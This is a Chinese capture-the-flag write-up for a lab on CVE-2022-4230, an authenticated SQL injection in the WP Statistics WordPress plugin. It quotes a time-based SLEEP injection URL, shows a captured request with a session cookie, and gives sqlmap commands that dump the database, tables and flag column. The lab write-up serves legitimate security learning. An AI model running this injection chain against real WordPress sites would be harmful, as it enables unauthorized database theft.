春秋云境 CVE-2022-4230
题目
通过给定的路径 第一次访问主页
空白的,什么都没有
尝试访问后台
别问为什么是wp-login.php,因为猜的,我猜的是admin和login,发现分别访问这两个路径,都会跳转到以下路径
http://eci-2ze6ki5jtumuv5ixl9hu.cloudeci1.ichunqiu.com/wp-login.php
这里的账号密码,纯属靠自己到处寻找线索,好在红色框框中就是账号和密码
登录成功的界面是这样的
wpscan漏洞介绍
WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com)
有兴趣可以深究下,wpscan平台是专门针对wordpress的漏洞平台,由于国外的网站,所以需要点魔法,懂得都懂
其中重点内容
Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s:
http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR
翻译的意思
以允许查看WP统计信息的用户身份登录,并通过获取随机数https://example.com/wp-admin/admin-ajax.php?action=rest-nonce,并在下面的URL中使用它,该URL将延迟5s
首先通过访问(必须要先登录过后台才行)
http://eci-2ze6ki5jtumuv5ixl9hu.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce
获取随机数
首先用浏览器访问,查看一下效果先
http://eci-2ze6ki5jtumuv5ixl9hu.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=1b59e86c38&name=words&search_engine=aaa
其中 _wpnonce 的值是上面刚刚获取的随机数
会显示如下界面
用浏览器,开启代理,并且刷新当前页面或者再次访问 并且 通过burp抓取数据包
将Raw中的数据复制下来,并且保存到桌面,命名为test.txt
test.txt文件中的内容
GET /wp-json/wp-statistics/v2/metabox?_wpnonce=1b59e86c38&name=words&search_engine=aaa HTTP/1.1
Host: eci-2ze6ki5jtumuv5ixl9hu.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_6944564f814df9b2fbe11eb13facce02=test%7C1714756444%7CzIsIpot89sHX7l3iB3JS7s3IVkWfnMxqlPnCV2ukwUb%7C7be71dbfa0bb6449f63126909447b7726883186dde21851def2932995d1826ce; wp-settings-time-1=1714583645
Upgrade-Insecure-Requests: 1
在kali中桌面处开启超级管理员的终端
获取数据库名
sqlmap -r test.txt --batch --dbs
这里就发现了敏感数据库名,wordpress
获取表名
sqlmap -r test.txt --batch -D wordpress --tables
上图一看就发现了,我们想要的flag表
获取字段
sqlmap -r test.txt --batch -D wordpress -T flag --columns
上图看到了flag字段
获取字段值,也就是flag
sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump
自此,终于获得了flag,真的是不容易啊!!!!